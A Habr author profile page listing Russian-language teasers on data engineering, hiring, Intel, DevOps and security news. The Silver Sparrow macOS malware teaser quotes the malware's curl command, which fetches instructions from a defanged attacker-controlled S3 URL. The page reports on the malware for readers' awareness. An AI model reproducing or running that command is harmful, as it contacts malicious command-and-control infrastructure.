Pull to refresh
367
115.5
Александр Якубович @ragequit

Пишу IT-статьи и фэнтези

Send message

Переход с ETL на ELT

Level of difficultyMedium
Reading time6 min
Views6.9K


ETL (Извлечение-Трансформация-Загрузка) и ELT (Извлечение-Загрузка-Трансформация) — два термина, которые часто используются в области дата-инжиниринга, особенно в контексте захвата и преобразования данных. Хотя эти термины часто используются как взаимозаменяемые, они относятся к немного разным концепциям и имеют различные последствия для проектирования конвейера данных.

В этом посте мы проясним определения процессов ETL и ELT, обозначим различия между ними и обсудим преимущества и недостатки, которые они предлагают инженерам и командам по работе с данными в целом. И самое главное, я опишу, как недавние изменения в формировании современных команд по работе с данными повлияли на ландшафт борьбы ETL против ELT.

Понимание Извлечения (Extract), Загрузки (Load) и Трансформации (Transform) независимо друг от друга


Главный вопрос при сравнении ETL и ELT, очевидно, последовательность выполнения шагов Извлечения, Загрузки и Трансформации в рамках данных.
Читать дальше →
Total votes 26: ↑24 and ↓2+22
Comments9

Как мы перевезли на новый сайт 700 тысяч рецептов и 6 миллионов фото пирогов, сырников и овсяноблинов

Level of difficultyEasy
Reading time6 min
Views3.1K


На рынке частой историей является поглощение глобальными игроками локальных интернет-сервисов и ресурсов, которые дублируют их функции. Так произошло в 2017 году и с парой «Овкусе» и Cookpad, когда последний решил зайти в русскоязычный сегмент. Тогда слияние произошло успешно: российский проект был куплен и органично влился в инфраструктуру кулинарного ресурса японского происхождения, где активно развивался все эти годы. Ровно до момента, пока головной офис не принял решение уйти из региона, полностью удалив русскоязычную часть Cookpad вместе со всем имеющимся контентом.

Сегодня мы расскажем о том, как нашей команде пришлось переносить данные целого проекта на новую платформу и с чем нам пришлось столкнуться при переезде 6 миллионов фото блюд из 700 тысяч рецептов, которые создали пользователи платформы за 15 лет.
Читать дальше →
Total votes 24: ↑23 and ↓1+22
Comments7

Почему разработчикам приходится проходить через этот унизительный процесс собеседований

Level of difficultyEasy
Reading time6 min
Views21K

Собеседование на позицию мидла в 2023 году, фото в цвете

Нет сейчас более сложной в трудоустройстве сферы, чем IT. И речь идет не о количестве кандидатов на одно место, хотя и здесь не все гладко, а, скорее, о том, как сам по себе выстроен процесс наёма. С каждым годом собеседование на любую девелоперскую позицию все больше и больше походит на попытку просочиться сквозь мясорубку, а в конце остаться одним куском.

К сожалению, мало кто задумывается, как мы к этому пришли и чем это грозит индустрии, но конкретно в IT появляется все больше и больше порочных практик в плане собеседований. Так, в русскоязычном комьюнити в том же твиттере на голубом глазу уже полгода обсуждают, стоит ли «приписывать» себе пару лет опыта в резюме, чтобы получить лучший оффер. Следом за этими же высказываниями появляется вполне обоснованный твит о том, что бесплатные тестовые, да и вообще практические тестовые задания — неважно, на двадцать минут или на пять дней — порочная практика и браться за них не стоит. И все это щедро присыпано всевозможными менторами, которые научат правильно «накидывать» себе опыта коммерческой разработки, рассуждениями о том, что по собесам надо ходить, как на вторую работу, и вообще, что HR-ам так и надо.

Проблема верификации опыта


Я сам не люблю процесс наёма и собеседования. Не люблю неквалифицированных IT-рекрутеров, их всевозможные списки, отсутствие обратной связи или, наоборот, чрезмерную навязчивость вкупе с полным непониманием предмета разговора. Но что если копнуть чуть глубже и подумать: а не виноваты ли мы сами в том хаосе, который сейчас творится на рынке труда? И что намного важнее: как это можно исправить?
Читать дальше →
Total votes 38: ↑32 and ↓6+26
Comments117

Почему нам не нужно вводить мораторий и ограничивать разработку более мощных ИИ-технологий

Level of difficultyEasy
Reading time11 min
Views14K


На днях Илон Маск, сооснователь Apple Стив Возняк, а также свыше тысячи специалистов в области высоких технологий и искусственного интеллекта обратились с открытым письмом, призывающим временно приостановить развитие нейросетей из-за возможных рисков. Документ размещен на веб-сайте некоммерческого института Future of Life («Институт будущего жизни»).

Но далеко не все разделяют мнение Маска, а его стремление навязать ИИ-сфере моратории и жесткое регулирование слишком походит на одну из форм геронтократии, когда «старики» пытаются остановить прогресс и сохранить существующий статус-кво, опасаясь того, что баланс и расстановка сил претерпят серьезные изменения, что приведет в итоге к перераспределению власти и капитала.

Под катом — семь причин, почему нам не стоит слушать Маска и других подписавшихся под этим письмом людей и останавливать разработку систем вида GPT-4.
Читать дальше →
Total votes 46: ↑32 and ↓14+18
Comments105

Уход сотрудников на удалёнку снёс крышу менеджерам

Reading time5 min
Views71K

Пустая парковка у офиса Facebook в Менло-Парк, 14 апреля 2020 года. Фото: Jeff Chiu/Associated Press

Если бы этой пандемии не случилось, её нужно было придумать. Огромное количество людей наконец-то поняли, насколько удобнее и эффективнее работать дома, насколько меньше времени уходит на бессмысленные поездки, стояние в пробках, переговоры в шумном офисе. Теперь до 42% сотрудников не хотят возвращаться, что вполне логично. Люди нащупали баланс между работой и личной жизнью, ощутили вкус свободы. Они готовы отказаться от серьёзной прибавки в зарплате, лишь бы остаться на удалёнке.

Но самая трагическая история произошла с менеджерами. Их судьба повисла на волоске. Профессиональные переговорщики всю жизнь оттачивали навыки презентаций, личных собеседований, психологического давления, плетения интриг. Они буквально лишились почвы под ногами — разработчики массово ушли из-под контроля, и что самое зловещее, они продолжают спокойно работать на удалёнке, разбирают таски и решают задачи, будто менеджеры и не нужны вовсе! Конечно, такая ситуация совершенно недопустима (по мнению менеджеров).
Читать дальше →
Total votes 186: ↑152 and ↓34+118
Comments284

Как жить, если ты девопс?

Reading time14 min
Views29K


Я уже лет 10 занимаюсь, в основном, менеджерской работой, но недавно решил освежить свои технические навыки и поближе познакомиться со стеком современных DevOps-инструментов. Я взял на себя исполнительскую работу с несколькими клиентами компании и, имея понимание, как исполнителя обычно видит менеджер, получил любопытный опыт, которым хочу поделиться.
Читать дальше →
Total votes 48: ↑48 and ↓0+48
Comments19

Как выглядит современный дата-центр изнутри

Reading time5 min
Views9.1K
«Миран» пришел на рынок коммерческих ЦОДов в 2010 году. За это время мы построили два дата-центра и стали предоставлять широкий спектр услуг по аренде и размещению серверного оборудования. Но этот год — особенный, так как мы завершили строительство новой и самой масштабной очереди в ЦОД «Миран-2».

Как обычно выглядит серверная дата-центра в представлении обывателя? Все мы видели множество красивых картинок с фотостоков, но чаще всего, реальность выглядит совершенно по-другому: серверная, являясь техническим помещением, своим внешним видом воображение не поражает. Просто ряды стоек или шкафов, от которых тянутся многочисленные кабели.

Сейчас рынок хостинга и аренды стоек растет: по прогнозам, к 2024 году рынок арендных мощностей вырастет вдвое по сравнению с концом 2019 года. Так что сейчас дата-центры растут, как грибы после дождя. Чем отличается наш? Тем, что мы стали планировать его постройку задолго до пандемии и резкого скачка спроса, а к активному проектированию приступили летом 2020 года.


Читать дальше →
Total votes 3: ↑3 and ↓0+3
Comments0

Смертельное переполнение стека. Почему Bunny потеряли свой DNS и как предотвратить подобное

Reading time6 min
Views8.5K


Примечание: Bunny CDN — сеть доставки контента и облачный хостинг со своими серверами DNS

Если в bunny.net есть что-то важнее производительности, то это надёжность. Всё продумано. Избыточный мониторинг, система автоматического восстановления, auto-healing на нескольких уровнях, три резервные сети DNS и система, которая связывает всё это вместе и гарантирует аптайм.

Но в нашей ситуации ничего не помогло. 22 июня 2021 года после почти двух лет безупречной работы из-за сбоя DNS произошло полное отключение почти всех систем. 750 000 сайтов частично ушли в офлайн более чем на два часа. В мгновение ока мы потеряли более 60% трафика и сотни гигабит пропускной способности. Несмотря на все резервные системы, глобальный сбой вызвало простое обновление одного файла.
Читать дальше →
Total votes 37: ↑37 and ↓0+37
Comments9

Концепция периметра безопасности устарела. Но как усложнить жизнь хакерам?

Reading time5 min
Views6.4K
Потребность в коллективной работе на ниве информационной безопасности возникла не вчера: современные реалии диктуют нам необходимость объединять свои усилия, неважно, идет речь о партнерах или конкурентах по рынку, ведь в конечном итоге цель инфобеза — обезопасить клиента. Именно поэтому еще на заре интернета стали возникать различные союзы и альянсы.

Но почти ни один из них не оказался достаточно обширным, устойчивым или влиятельным, чтобы кардинально повлиять на происходящее в пространстве информационной безопасности продуктов и данных. При этом сама природа подобного сотрудничества невзирая на рыночные условия — прямо противоположна концепции свободной конкуренции. Да и вообще, совместный поиск эксплоитов и способов противодействия хакерам порочен, потому что в его основе лежит инструментарий взлома продукта — что может вылиться в банальный промышленный шпионаж, прикрытый благими целями коллективной безопасности. Да и почему бы не понаблюдать, как твой прямой конкурент отбивается от хакерской атаки? Такое типичное: «я сижу у реки, а мимо проплывает труп моего врага».



Вот только этот «труп» потом отравляет всю «реку», ведь в головах потенциальных клиентов, в том числе и в головах тех людей, которые подписывают бюджеты и внедрение новых решений, не задерживаются названия компаний, а задерживается сам концепт. В итоге у нас до сих пор «облака — это опасно», «данные крадут ежедневно» и так далее.

И сейчас мы имеем мир, где информация, в том числе и по теме инфобеза, ценна, закрыта и ею делятся крайне неохотно. И по этой причине хакеры побеждают, причем — уверенно.
Читать дальше →
Total votes 18: ↑14 and ↓4+10
Comments10

Совместная игра в Factorio — лучшее собеседование для программистов, что мы проводили

Reading time11 min
Views79K
В последнее время много копий сломано вокруг технических собеседований. Очевидно, что инвертирование двоичного дерева на доске практически никак не связано с практическими навыками реального программиста. Примитивный Fizzbuzz по-прежнему остаётся самым эффективным тестом. Как следствие, выросло внимание к опенсорсным проектам, но оказалось, что это тоже не очень хороший показатель, потому что у большинства профессионалов нет на них времени.

У нас в компании самое эффективное собеседование по программированию на сегодняшний день — это обычно какое-то домашнее задание на несколько дней, в котором кандидата просят исправить баг или реализовать небольшую функцию. Это не очень хорошо, потому что занимает много времени, и человек может получить внешнюю помощь (или погуглить, если функция достаточно распространённая). С другой стороны, некоторые крупные компании вместо этого удвоили количество собеседований с доской (и алгоритмами), подвергая будущих инженеров многочасовым сессиям онлайн-программирования с различным уровнем инвазивного наблюдения.

Все эти методы интервью не сравнятся с очень простой метрикой: совместная игра в Factorio. Прохождение всего цикла Factorio — практически идеальный показатель, насколько хорошо человек решает общие технические проблемы. Можно даже настроить прохождение игры на основе будущей должности, чтобы лучше понять, как кандидат справится со своей ролью.
Читать дальше →
Total votes 110: ↑106 and ↓4+102
Comments144

На 30 тысячах компьютеров с macOS нашли странный зловред, который ждёт команду

Reading time4 min
Views22K


Новая вредоносная программа Silver Sparrow («Серебряный воробей»), обнаруженная почти на 30 000 компьютерах Mac по всему миру, привлекла внимание специалистов по безопасности. Причин несколько. Во-первых, зловред поставляется в двух бинарниках, в том числе для процессора М1. Во-вторых, исследователи не могут понять цель злоумышленников.

Раз в час заражённые компьютеры проверяют контрольный сервер на предмет новых команд или двоичных файлов для выполнения:

curl hxxps://specialattributes.s3.amazonaws[.]com/applications/updater/ver.json > /tmp/version.json
plutil -convert xml1 -r /tmp/version.json -o /tmp/version.plist
Читать дальше →
Total votes 28: ↑25 and ↓3+22
Comments30

О проблемах нормальной оценки фич и как их решить

Reading time8 min
Views10K
image

Привет. Давайте я расскажу вам о своем опыте в оценке программных продуктов. Я занимаюсь этим без перерывов уже 15 лет, и мне бы хотелось поделиться опытом и эволюцией моих взглядов на оценку. Уверен, что это будет полезно. Начнем с целеполагания. Зачем вообще оценивать? Кому это надо?

Ответ на самом деле очень простой — людям хочется определенности, в частности ответа на вопрос «когда будет готово?». Когда мне можно в отпуск, когда начнутся продажи, когда делать связанную задачу. С другой стороны — мало ли что люди хотят, почему из-за чужих желаний тратить свое время на это занятие?

Но, в конечном счете, нам всем бы хотелось получать зарплату, а зарплата не из воздуха появляется, ее компания берет из выручки, в отдельном случае — из инвестиций. А чтобы эта самая выручка была, нам надо достигать бизнес-цели. А люди, которые формулируют бизнес-цели очень любят всякие финансовые формулы — ROI, LTV и прочая EBITDA. А в этих формулах постоянно фигурируют сроки. Без них крокодил не ловится, не растет кокос.
Читать дальше →
Total votes 29: ↑28 and ↓1+27
Comments73

В чём главные проблемы Intel

Reading time9 min
Views38K


Оглядываясь назад, моя статья по поводу назначения нового исполнительного директора Intel в 2013 году оказалась чрезмерно оптимистичной. Одно название чего стоит: «Возможность для Intel». В реальности вышло не так — за эти годы у Intel ничего не получилось, никакими возможностями она не воспользовалась.

Откуда мы знаем, что не получилось? Во-первых, спустя восемь лет Intel опять назначает нового директора (Пэт Гелсингер), но не вместо того, о котором я писал (Брайан Кржанич), а вместо его преемника (Боб Свон). Очевидно, в то самое окно возможностей компания на самом деле не попала. И теперь уже встаёт вопрос выживания компании. И даже вопрос национальной безопасности Соединённых Штатов Америки.
Читать дальше →
Total votes 51: ↑46 and ↓5+41
Comments40

Организуем платформу обработки потоковых данных из Kafka, Spark и Greenplum

Reading time8 min
Views9.6K

Привет, Хабр! 

Меня зовут Иван Хозяинов, а работаю в ITSumma, где изучаю и применяю технологии, связанные с большими данными, машинным обучением и аналитикой. В этой статье хочу рассказать о системе хранения и обработки данных и инструментах, которые встречаются на пути от сырых исходников до представления, удобного для последующего анализа. 

Поговорим, как связаны серверы в дата-центре и распределенные приложения для обработки данных и почему пришлось написать свой коннектор для Spark и Greenplum.

Читать далее...
Total votes 19: ↑18 and ↓1+17
Comments28

Как начать программировать в парах

Reading time6 min
Views9.4K
Привет. Меня зовут Дима Вдовин. В предыдущей статье я излагал теорию о парном программировании и говорил о том, какие плюсы вижу в этом подходе. Сегодня я бы хотел продолжить эту тему и поговорить о том, как начать практиковать парное программирование у себя в команде. Полный перечень всех плюсов есть в предыдущей статье, а тут мы просто тезисно вспомним, что нам дает парное программирование.

  • Обучение и онбординг новичков.
  • Шеринг кода/процессов и обмен опытом.
  • Пара решает проблему быстрее и реже обращаются за помощью.
  • Повышение производительности.
  • Сплочение коллектива.
  • Увеличение скорости ревью.

Последний пункт стоит пояснить отдельно. Так как при работе в паре процесс ревью, фактически, проходит в фоновом режиме, то и часть ошибок отсеивается еще на этапе написания кода. Благодаря этому итераций на ревью становится значительно меньше. Тут хорошо подходит вот эта картинка:


Но давайте начнем с грустного и поговорим о том, что может помешать начать внедрять парное программирование в своей команде.
Читать дальше →
Total votes 39: ↑37 and ↓2+35
Comments38

Инженер купил 220 нерабочих плат Raspberry Pi Model B и начал их ремонтировать

Reading time4 min
Views124K


Инженер и блогер Джеймс Доусон специализируется на обзорах одноплатных компьютеров, но сейчас он начал необычный марафон, а заодно решил подзаработать. Инженер купил на eBay партию примерно из 220 нерабочих компьютеров Raspberry Pi Model B за 61 фунт, то есть практически на вес.

Задача такая: диагностировать платы, найти неисправности, починить — и продать. Платы простые, починить вроде бы легко.
Читать дальше →
Total votes 135: ↑127 and ↓8+119
Comments160

Новый глава Intel вернул с пенсии ведущего архитектора Nehalem

Reading time4 min
Views20K


Новый генеральный директор Пэт Гелсингер до своего ухода из Intel работал в компании 30 лет и поднялся до ранга CTO, потом ушёл. Теперь его возвращение и назначение на должность CEO считают признаком выздоровления Intel. Возможно, компания сможет переломить тренд и вернуться на лидирующие роли в бизнесе. Однако нужен кардинальный технологический прорыв. А кто для него подойдёт лучше, чем бывший технический директор Пэт Гелсингер, главный технарь в компании?

Гелсингер с первых дней оправдывает ожидания, которые на него возлагают. Он начал с того, что возвращает на работу в компанию ведущих инженеров и архитекторов CPU, своих бывших коллег.
Читать дальше →
Total votes 40: ↑40 and ↓0+40
Comments27

Наследование в Nuget-пакетах

Reading time5 min
Views4.2K
image

Nuget-пакет — это не только архив с переиспользуемыми сборками, но и контент с target-скриптами, которые задают поведение MsBuild при сборке приложения. Это дает нам возможность рассматривать nuget-пакет в качестве самостоятельного объекта, у которого есть состояние и поведение.

А раз у нас есть объект, то что мешает попробовать посмотреть на работу с ним со стороны объектно-ориентированной парадигмы? Давайте попробуем применить для nuget-пакетов один из основных принципов ООП — наследование.
Читать дальше →
Total votes 22: ↑22 and ↓0+22
Comments7

Быстрый туториал по установке и эксплуатации системы фильтрации IP-адресов CrowdSec v.1.0.x

Reading time7 min
Views8.3K

Всем привет! Перед Новым годом мы выпустили большой апдейт нашего продукта — CrowdSec v.1.0.X, в котором содержатся значительные изменения по сравнению с предыдущей версией. Самое главное: был введен в эксплуатацию локальный REST API и проведены соответствующие архитектурные изменения. Как следствие, значительно упростился процесс создания баунсеров и повышена их устойчивость, при этом снизилось время на обслуживание системы. 

В этой статье вы найдете основные материалы о том, как был переделан CrowdSec и, в целом, ее можно рассматривать как User Guide для тех, кто собирается попробовать наш продукт на своих системах. 

Быстрый и приятный туториал далее
Total votes 16: ↑16 and ↓0+16
Comments0

Western Digital разработала новую файловую систему для Linux-систем

Reading time4 min
Views22K
На полях файловых систем редко происходит что-то новое. У нас есть FAT/16/32, NTFS, Ext4, Btrfs и другие, более экзотичные способы управления дисковым пространством. Файловая система в целом явление статичное: когда-то разработчики и инженеры придумали, как структурировать данные на диске, и с тех пор все мы этим пользуемся не задумываясь, что происходит «под капотом» на уровне железа.

И вот теперь, компания-производитель накопителей Western Digital заявила, что активно занимается разработкой новой файловой системы DZS или Digital Zoned Storage. Основная цель новой системы — применение в промышленном оборудовании HDD и твердотельных накопителях с последующим снижением нагрузки на контроллер SSD.



Для HDD файловая система DZS сильна тем, что упрощает традиционную схему доступа к файлам и дает пользователю удобный API для управления данным вкупе с использованием черепичной технологии записи SMR.



Фактически, разработка будет интересна, в первую очередь, администраторам СУБД и прочим пользователям, оперирующим большим массивом статичных данных.
Читать дальше →
Total votes 36: ↑31 and ↓5+26
Comments38
1
23 ...

Information

Rating
25-th
Location
Минск, Минская обл., Беларусь
Works in
Date of birth
Registered
Activity